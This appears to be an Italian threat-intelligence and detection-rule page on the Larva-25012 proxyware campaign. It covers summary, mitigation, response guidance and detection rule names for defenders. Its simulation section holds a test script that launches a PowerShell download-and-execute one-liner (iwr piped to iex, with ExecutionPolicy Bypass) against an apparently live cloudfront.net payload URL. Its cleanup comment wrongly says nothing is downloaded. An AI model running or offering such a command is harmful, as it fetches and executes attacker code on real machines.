Larva-25012: Una Campagna di Distribuzione di Proxyware del 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
L’attore della minaccia Larva-25012 sta distribuendo attivamente Proxyware per monetizzare i sistemi compromessi dirottando la larghezza di banda degli utenti. La campagna si basa su infezioni esistenti di DPLoader e si affida a diversi canali di distribuzione, tra cui siti web di download di YouTube e GitHub. Il malware distribuisce diverse famiglie di Proxyware, inclusi DigitalPulse, SOAX, Appsalt e IPRoyal.
Indagine
Il Centro d’Intelligence sulla Sicurezza di AhnLab (ASEC) ha monitorato l’attività di proxyjacking in corso e identificato le operazioni rinnovate di Larva-25012 nella seconda metà del 2026. L’indagine ha rilevato che gli attaccanti utilizzano varianti JavaScript e Python di DPLoader per mantenere la persistenza ed eseguire comandi PowerShell. Sono anche creati compiti pianificati per garantire che gli script dannosi continuino a essere eseguiti su sistemi compromessi.
Mitigazione
Gli utenti dovrebbero evitare di scaricare file eseguibili da siti web sospetti, annunci pop-up o piattaforme di condivisione file non ufficiali. Il software dovrebbe essere ottenuto solo da fonti affidabili e legittime, mentre app craccate e siti di download illegali dovrebbero essere evitati. Le organizzazioni dovrebbero anche mantenere le soluzioni di protezione degli endpoint, inclusi V3, completamente aggiornate.
Risposta
Quando viene rilevata un’attività sospetta, gli amministratori dovrebbero identificare e terminare i processi PowerShell dannosi e i compiti pianificati associati alle famiglie di Proxyware interessate. I sistemi dovrebbero anche essere controllati per DPLoader, che serve come componente chiave di infezione e persistenza. Controllare il traffico di rete in uscita per connessioni non autorizzate a infrastrutture C2 conosciute o sospette.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Scaricamento o Caricamento tramite Powershell (via cmdline)
Processi Figli NodeJS Sospetti [Windows] (via cmdline)
Disabilita Monitoraggio Realtime di Windows Defender e Altre Modifiche Preferenze (via cmdline)
Chiama Metodi .NET Sospetti da Powershell (via powershell)
Possibile Abuso del Dominio di Sviluppo di Cloudflare (via dns)
IOC (HashMd5) da rilevare: Larva-25012: Una Campagna di Distribuzione Proxyware 2026
Rilevamento di Script di Installazione di Proxyware PowerShell [Windows Powershell]
Esecuzione di Simulazione
-
Narrativa & Comandi di Attacco: Un avversario, tentando di installare proxyware per l’uso non autorizzato della larghezza di banda (Larva-25012), esegue una one-liner PowerShell. L’obiettivo è bypassare la scansione locale dei file scaricando il payload direttamente in memoria. Utilizzano il
-ExecutionPolicy Bypassflag per garantire l’esecuzione dello script eiwrper recuperare il file da una distribuzione Cloudfront, reindirizzandolo aiexper l’esecuzione immediata. Questa specifica riga di comando è una delle firme mirate nella regola di rilevamento. -
Script di Test di Regressione:
# Simulazione di Installazione di Proxyware Larva-25012 # Questo comando è specificamente progettato per corrispondere alla selezione2 nella regola di rilevamento. $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # Usiamo Start-Process per garantire che la riga di comando sia catturata come un nuovo evento di processo Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
Comandi di Pulizia:
# Nessun file viene effettivamente scaricato a causa della natura del pipe 'iex' nella simulazione, # ma se fossero stati creati degli artefatti, verrebbero rimossi qui. Write-Host "Pulizia della simulazione completata. Nessun artefatto persistente creato."